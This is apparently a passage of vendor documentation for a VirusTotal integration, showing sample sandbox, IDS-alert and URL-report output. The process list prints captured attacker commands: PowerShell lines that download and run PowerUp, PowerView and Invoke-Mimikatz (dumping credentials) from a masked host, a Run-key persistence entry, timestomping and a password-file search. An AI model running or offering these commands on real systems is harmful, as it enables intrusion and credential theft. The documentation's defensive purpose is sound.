"\\***\\***\\***",
"\\***\\***\\***\\.net clr networking"
],
"tags": [
"DIRECT_CPU_CLOCK_ACCESS",
"CHECKS_NETWORK_ADAPTERS",
"DETECT_DEBUG_ENVIRONMENT",
"RUNTIME_MODULES"
],
"registry_keys_deleted": [
"\\Software\\***\\***\\***\\***\\***\\***",
"\\Software\\***\\***\\***\\***\\***\\***",
"\\Software\\***\\***\\***\\***\\***\\***",
"\\Software\\***\\***\\***\\***\\***\\***",
"\\System\\***\\***\\***\\***"
],
"text_highlighted": [],
"ids_alerts": [
{
"rule_category": "misc-activity",
"rule_url": "https://www.***/***",
"alert_severity": "low",
"rule_msg": "PROTOCOL-ICMP PING Windows",
"rule_source": "Snort registered user ruleset",
"rule_raw": "alert icmp $EXTERNAL_NET any -> $HOME_NET any ( msg:\"PROTOCOL-ICMP PING Windows\"; itype:8; content:\"abcdefghijklmnop\",depth 16; metadata:ruleset community; classtype:misc-activity; sid:***; rev:11; )",
"rule_id": "*****"
},
{
"rule_category": "successful-recon-limited",
"alert_severity": "medium",
"rule_msg": "PROTOCOL-ICMP Unusual PING detected",
"rule_raw": "alert icmp $HOME_NET any -> $EXTERNAL_NET any ( msg:\"PROTOCOL-ICMP Unusual PING detected\"; icode:0; itype:8; fragbits:!M; content:!\"ABCDEFGHIJKLMNOPQRSTUVWABCDEFGHI\",depth 32; content:!\"0123456*****abcdefghijklmnopqrstuv\",depth 32; content:!\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\",depth 36; content:!\"WANG2\"; content:!\"cacti-monitoring-system\",depth 65; content:!\"SolarWinds\",depth 72; metadata:policy max-detect-ips drop,ruleset community; reference:url,krebsonsecurity.com/2014/01/a-closer-look-at-the-target-malware-part-ii/; reference:url,krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware/; classtype:successful-recon-limited; sid:29456; rev:3; )",
"rule_references": [
"https://krebsonsecurity.com/2014/01/***/",
"https://krebsonsecurity.com/2014/01/***/"
],
"rule_source": "Snort registered user ruleset",
"rule_url": "https://www.snort.org/***",
"rule_id": "*****"
},
{
"rule_category": "misc-activity",
"rule_url": "https://www.*****.***/*****",
"alert_severity": "low",
"rule_msg": "PROTOCOL-ICMP PING",
"rule_source": "Snort registered user ruleset",
"rule_raw": "alert icmp $EXTERNAL_NET any -> $HOME_NET any ( msg:\"PROTOCOL-ICMP PING\"; icode:0; itype:8; metadata:ruleset community; classtype:misc-activity; sid:384; rev:8; )",
"rule_id": "*****"
},
{
"rule_category": "misc-attack",
"alert_severity": "medium",
"rule_msg": "SERVER-OTHER MRLG fastping echo reply memory corruption attempt",
"tags": [
"cve-2014-3931"
],
"rule_raw": "alert icmp $EXTERNAL_NET any -> $HOME_NET any ( msg:\"SERVER-OTHER MRLG fastping echo reply memory corruption attempt\"; icode:0; itype:0; content:!\"ABCDEFGHIJKLMNOPQRSTUVWABCDEFGHI\",depth 32; content:!\"0123456*****abcdefghijklmnopqrstuv\",depth 32; content:!\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\",depth 36; byte_test:4,>,1000000,8,little; metadata:policy max-detect-ips drop; reference:cve,2014-3931; reference:url,mrlg.op-sec.us/; reference:url,s3.eurecom.fr/cve/CVE-2014-3931.txt; classtype:misc-attack; sid:31767; rev:2; )",
"rule_references": [
"https://cve.mitre.org/***",
"https://mrlg.op-sec.us/***",
"https://s3.eurecom.fr/***.txt"
],
"rule_source": "Snort registered user ruleset",
"rule_url": "https://www.snort.org/***",
"rule_id": "*****"
},
{
"rule_category": "misc-activity",
"rule_url": "https://www.snort.org/***",
"alert_severity": "low",
"rule_msg": "PROTOCOL-ICMP Echo Reply",
"rule_source": "Snort registered user ruleset",
"rule_raw": "alert icmp $EXTERNAL_NET any -> $HOME_NET any ( msg:\"PROTOCOL-ICMP Echo Reply\"; icode:0; itype:0; metadata:ruleset community; classtype:misc-activity; sid:***; rev:8; )",
"rule_id": "*****"
},
{
"rule_category": "non-standard-protocol",
"rule_url": "https://www.snort.org/***",
"alert_severity": "medium",
"rule_msg": "DELETED BAD TRAFFIC Non-Standard IP protocol",
"rule_source": "Snort registered user ruleset",
"rule_raw": "alert ip $EXTERNAL_NET any -> $HOME_NET any ( msg:\"DELETED BAD TRAFFIC Non-Standard IP protocol\"; ip_proto:!1; ip_proto:!2; ip_proto:!47; ip_proto:!50; ip_proto:!51; ip_proto:!6; ip_proto:!89; classtype:non-standard-protocol; sid:***; rev:6; )",
"rule_id": "*****"
},
{
"rule_category": "bad-unknown",
"alert_severity": "medium",
"rule_msg": "PROTOCOL-DNS SPOOF query response with TTL of 1 min. and no authority",
"rule_raw": "alert udp $EXTERNAL_NET 53 -> $HOME_NET any ( msg:\"PROTOCOL-DNS SPOOF query response with TTL of 1 min. and no authority\"; flow:to_client; content:\"|81 80|\",depth 4,offset 2,fast_pattern; byte_test:2,>,0,0,relative,big; byte_test:2,>,0,2,relative,big; content:\"|00 00 00 00|\",within 4,distance 4; content:\"|C0 0C 00 01 00 01|\",distance 0; byte_test:4,<,61,0,relative,big; byte_test:4,>,0,0,relative,big; metadata:policy max-detect-ips drop,ruleset community; service:dns; classtype:bad-unknown; sid:254; rev:16; )",
"alert_context": {
"src_ip": "*.*.*.*",
"src_port": 53
},
"rule_url": "https://www.*****.***/*****",
"rule_source": "Snort registered user ruleset",
"rule_id": "*****"
},
{
"rule_category": "not-suspicious",
"alert_severity": "low",
"rule_msg": "TAG_LOG_PKT",
"rule_raw": "alert ( gid:2; sid:1; rev:1; msg:\"TAG_LOG_PKT\"; metadata:rule-type preproc; classtype:not-suspicious; )",
"alert_context": {
"dest_port": 80,
"dest_ip": "***.***.***.***"
},
"rule_url": "https://www.*****.***/*****",
"rule_source": "Snort registered user ruleset",
"rule_id": "2:1"
},
{
"rule_category": "not-suspicious",
"alert_severity": "low",
"rule_msg": "TAG_LOG_PKT",
"rule_raw": "alert ( gid:2; sid:1; rev:1; msg:\"TAG_LOG_PKT\"; metadata:rule-type preproc; classtype:not-suspicious; )",
"alert_context": {
"dest_port": 80,
"dest_ip": "***.***.***.***"
},
"rule_url": "https://www.*****.***/*****",
"rule_source": "Snort registered user ruleset",
"rule_id": "2:1"
}
],
"modules_loaded": [],
"registry_keys_opened": [],
"ip_traffic": [],
"processes_tree": [],
"calls_highlighted": [
"GetTickCount",
"IsDebuggerPresent",
"GetAdaptersAddresses",
"GetSystemMetrics"
],
"has_memdump": false,
"verdicts": [
"MALWARE"
],
"files_written": [
"C:\\Users\\\\AppData\\Local\\Temp\\ossuhbwy.uot.ps1",
"C:\\Users\\\\AppData\\Local\\Temp\\ujcnqvp0.jwz.ps1",
"C:\\Users\\\\AppData\\Local\\Temp\\44xbj143.tmt.ps1",
"C:\\Users\\\\AppData\\Local\\Temp\\vxydjgdf.bkz.ps1",
"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Roaming\\Microsoft\\UPnP Device Host\\upnphost\\udhisapi.dll",
"C:\\Users\\\\AppData\\Local\\Temp\\44xbj143.tmt.ps1",
"C:\\Users\\\\AppData\\Local\\Temp\\xmyg1pzf.wlq.psm1",
"C:\\Users\\\\AppData\\Local\\Temp\\vxydjgdf.bkz.ps1",
"C:\\Users\\\\AppData\\Local\\Temp\\yf50esci.50a.psm1",
"C:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive",
"C:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache"
],
"dns_lookups": [
{
"resolved_ips": [
"131.107.255.255"
],
"hostname": "dns.msftncsi.com"
}
],
"has_evtx": false,
"http_conversations": [
{
"url": "http://***.***.***.***/c2server.htm",
"request_method": "CONNECT"
},
{
"url": "http://***.***.***.***/Invoke-Mimikatz.ps1",
"request_method": "CONNECT"
},
{
"url": "http://***.***.***.***/PowerUp.ps1",
"request_method": "CONNECT"
}
]
}
}The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
D3 customizes the Context Data by extracting the data from path $.data in API returned JSON.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
[
{
"attributes": {
"last_modification_date": 1632330799,
"last_http_response_cookies": {
"NID": "511=*****-*****",
"1P_JAR": "2021-09-22-17"
},
"times_submitted": 88586,
"total_votes": {
"harmless": 226,
"malicious": 104
},
"title": "Google",
"last_submission_date": 1632330474,
"last_http_response_content_length": 148497,
"last_http_response_headers": {
"x-xss-protection": "0",
"transfer-encoding": "chunked",
"set-cookie": "1P_JAR=2021-09-22-17; expires=Fri, 22-Oct-2021 17:08:02 GMT; path=/; domain=.google.com; Secure, NID=511=*****-*****; expires=Thu, 24-Mar-2022 17:08:02 GMT; path=/; domain=.google.com; HttpOnly",
"expires": "-1",
"server": "gws",
"cache-control": "private, max-age=0",
"date": "Wed, 22 Sep 2021 17:08:02 GMT",
"p3p": "CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"",
"alt-svc": "h3=\":443\"; ma=2592000,h3-29=\":443\"; ma=2592000,h3-T051=\":443\"; ma=2592000,h3-Q050=\":443\"; ma=2592000,h3-Q046=\":443\"; ma=2592000,h3-Q043=\":443\"; ma=2592000,quic=\":443\"; ma=2592000; v=\"46,43\"",
"content-type": "text/html; charset=UTF-8",
"x-frame-options": "SAMEORIGIN"
},
"reputation": 345,
"threat_names": [],
"tags": [],
"last_analysis_date": 1632330474,
"first_submission_date": 1281524160,
"categories": {
"Forcepoint ThreatSeeker": "search engines and portals",
"Sophos": "search engines",
"BitDefender": "searchengines"
},
"last_http_response_content_sha256": "*****",
"last_http_response_code": 200,
"last_final_url": "https://www.google.com/",
"url": "https://www.google.com/",
"last_analysis_stats": {
"harmless": 80,
"malicious": 1,
"suspicious": 0,
"undetected": 9,
"timeout": 0
},
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "malicious",
"result": "phishing",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"Comodo Valkyrie Verdict": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Cyren": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Cyren"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"BlockList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BlockList"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"0xSI_f33d": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "0xSI_f33d"
},
"Feodo Tracker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Feodo Tracker"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"CRDF": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CRDF"
},
"Rising": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Rising"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Fortinet": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Fortinet"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"Artists Against 419": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Artists Against 419"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"SafeToOpen": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Webroot": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Webroot"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"Kaspersky": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"Malware Domain Blocklist": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malware Domain Blocklist"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Netcraft": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Netcraft"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Sangfor": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sangfor"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Forcepoint ThreatSeeker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
}
},
"html_meta": {
"description": [
"Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for."
],
"robots": [
"noodp"
]
},
"outgoing_links": [
"https://www.blogger.com/*****",
"https://www.youtube.com/*****"
]
},
"type": "url",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/urls/*****"
}
}
]Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"FileHashes": [
"*****"
]
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
DATA |
|---|
{'file_hash': '*****', 'processes_terminated': ['\\reg.exe', '\\windowspowershell\\v1.0\\powershell.exe', '\\cmd.exe', '\\systeminfo.exe', '\\sppsvc.exe', '2288 - "C:\\Windows\\System32\\reg.exe" add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v d3commander /d C:\\Windows\\commander.exe /f', '2472 - "C:\\Windows\\System32\\systeminfo.exe" /fo csv', '2564 - "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -command $file=(gi c:\\windows\\commander.exe.config);$date=\'01/03/2000 12:12 pm\';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date', '2652 - "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -exec bypass -command "IEX (New-Object Net.WebClient).DownloadString(\'http://***.***.***.***/PowerUp.ps1\'); Get-ServiceUnquoted " >c:\\windows\\out1.txt', '2792 - C:\\Windows\\servicing\\TrustedInstaller.exe', '2840 - "C:\\Windows\\system32\\makecab.exe" C:\\Windows\\Logs\\CBS\\CbsPersist_20200609143948.log C:\\Windows\\Logs\\CBS\\CbsPersist_20200609143948.cab', '2884 - "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -exec bypass -command "IEX (New-Object Net.WebClient).DownloadString(\'http://***.***.***.***/Invoke-Mimikatz.ps1\'); Invoke-Mimikatz -DumpCreds " >c:\\windows\\out2.txt', '2052 - "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -exec bypass -command "IEX (New-Object Net.WebClient).DownloadString(\'http://***.***.***.***/PowerView.ps1\'); Get-NetComputer" >c:\\windows\\out3.txt', '2580 - "C:\\Windows\\System32\\reg.exe" query "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Profilelist" /s', '2984 - "C:\\Windows\\System32\\cmd.exe" /c dir c:\\users\\administrator\\*password* /b /s /a-d', '3068 - "C:\\Program Files\\Windows Media Player\\wmpnetwk.exe"', 'C:\\Windows\\System32\\reg.exe add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v d3commander /d C:\\Windows\\commander.exe /f', 'C:\\Windows\\System32\\reg.exe query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Profilelist /s', 'C:\\Windows\\System32\\cmd.exe /c dir c:\\users\\administrator\\*password* /b /s /a-d', 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command $file=(gi c:\\windows\\commander.exe.config);$date=01/03/2000 12:12 pm;$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date', 'C:\\Windows\\System32\\systeminfo.exe /fo csv', "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/PowerUp.ps1'); Get-ServiceUnquoted >c:\\windows\\out1.txt", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds >c:\\windows\\out2.txt"], 'files_deleted': ['C:\\Users\\\\AppData\\Local\\Temp\\44xbj143.tmt.ps1', 'C:\\Users\\\\AppData\\Local\\Temp\\xmyg1pzf.wlq.psm1', 'C:\\Users\\\\AppData\\Local\\Temp\\vxydjgdf.bkz.ps1', 'C:\\Users\\\\AppData\\Local\\Temp\\yf50esci.50a.psm1'], 'mutexes_created': ['\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCounterMutex', '\\Sessions\\1\\BaseNamedObjects\\Local\\ZoneAttributeCacheCounterMutex', '\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex', '\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex', '\\Sessions\\1\\BaseNamedObjects\\Global\\CPFATE_1276_v4.0.30319', '\\Sessions\\1\\BaseNamedObjects\\_SHuassist.mtx', '\\Sessions\\1\\BaseNamedObjects\\Global\\.net clr networking', '\\Sessions\\1\\BaseNamedObjects\\Global\\CorDBIPCSetupSyncEvent_2308', '\\Sessions\\1\\BaseNamedObjects\\Global\\CorDBIPCSetupSyncEvent_2060', '\\Sessions\\1\\BaseNamedObjects\\Global\\CorDBIPCSetupSyncEvent_1256', '\\Sessions\\1\\BaseNamedObjects\\Global\\CorDBIPCSetupSyncEvent_1872'], 'files_opened': ['%WINDIR%\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\5d0c037297cc1a64b52ce43b45c2ac2e\\mscorlib.ni.dll.aux', '%WINDIR%\\assembly\\nativeimages_v4.0.30319_64\\system\\47e0be927382f169f5de470fab0ceb7d\\system.ni.dll.aux', '%WINDIR%\\assembly\\nativeimages_v4.0.30319_64\\system.net.http\\0abb38ed93d36aabb6a6d32477515d18\\system.net.http.ni.dll.aux', '%WINDIR%\\assembly\\nativeimages_v4.0.30319_64\\system.core\\f5db2f7c181e6f1344c9bc8dbcffce3b\\system.core.ni.dll.aux', '%WINDIR%\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\38470d5ed01fd95e48dcf4e1b0b4774e\\system.configuration.ni.dll.aux', '%WINDIR%\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\8089ab42d28c269586b8d72c8e01701c\\system.xml.ni.dll.aux', '\\reg.exe', '\\ntdll.dll', '\\systeminfo.exe', '\\windowspowershell\\v1.0\\powershell.exe', '\\cmd.exe', '\\tzres.dll', '%WINDIR%\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll', '%WINDIR%\\assembly\\gac_msil\\system\\2.0.0.0__b77a5c561934e089\\system.dll', 'C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local', 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\', 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll', 'C:\\Windows\\Microsoft.NET\\Framework64\\', 'C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\clr.dll', 'C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll', 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll', 'C:\\Users\\\\Downloads\\Commander.exe.config', 'C:\\Users\\\\Downloads\\Commander.exe', 'C:\\Windows\\system32\\VERSION.dll', 'C:\\Windows\\system32\\VCRUNTIME140_CLR0400.dll', 'C:\\Windows\\system32\\ucrtbase_clr0400.dll', 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config', 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\fusion.localgac', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll.aux', 'C:\\Users\\', 'C:\\Users\\\\', 'C:\\Users\\\\Downloads\\', 'C:\\Windows\\system32\\rpcss.dll', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Commander\\', 'C:\\Users\\\\Downloads\\Commander.INI', 'C:\\Windows\\system32\\api-ms-win-core-xstate-l2-1-0.dll', 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll', 'C:\\Windows\\assembly\\pubpol24.dat', 'C:\\Windows\\assembly\\GAC\\PublisherPolicy.tme', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\e43dd9c73ab5615e461bf5109c3facd6\\System.ni.dll', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\e43dd9c73ab5615e461bf5109c3facd6\\System.ni.dll.aux', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Net.Http\\', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Net.Http\\04ab5d047cc99fc5dad36592f805b227\\System.Net.Http.ni.dll', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Net.Http\\04ab5d047cc99fc5dad36592f805b227\\System.Net.Http.ni.dll.aux', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\0d59b0e237d7519417de10cd84bda4e7\\System.Core.ni.dll', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\0d59b0e237d7519417de10cd84bda4e7\\System.Core.ni.dll.aux', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\4beb1eeca20b27d4bd1bb9880f03cc2a\\System.Configuration.ni.dll', 